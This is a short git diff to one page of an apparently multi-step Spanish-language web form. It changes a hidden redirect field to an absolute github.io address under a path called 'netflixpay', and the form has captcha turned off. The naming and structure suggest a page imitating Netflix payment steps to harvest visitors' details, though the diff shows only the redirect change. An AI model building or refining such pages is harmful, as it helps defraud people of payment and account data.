--- a/sexion4.html
+++ b/sexion4.html
@@ -34,9 +34,10 @@
         <div class="form_section2">
             <input id="enviar" type="submit" value="Siguiente" method="POST">
         </div>
-        <input type="hidden" name="_next" value="sexion6.html">    
+        <input type="hidden" name="_next" value="https://juank95frontentdv.github.io/netflixpay/sexion6.html">    
         <input type="hidden" name="_captcha" value="false">     
     </form>
 </body>
 
 </html>
+
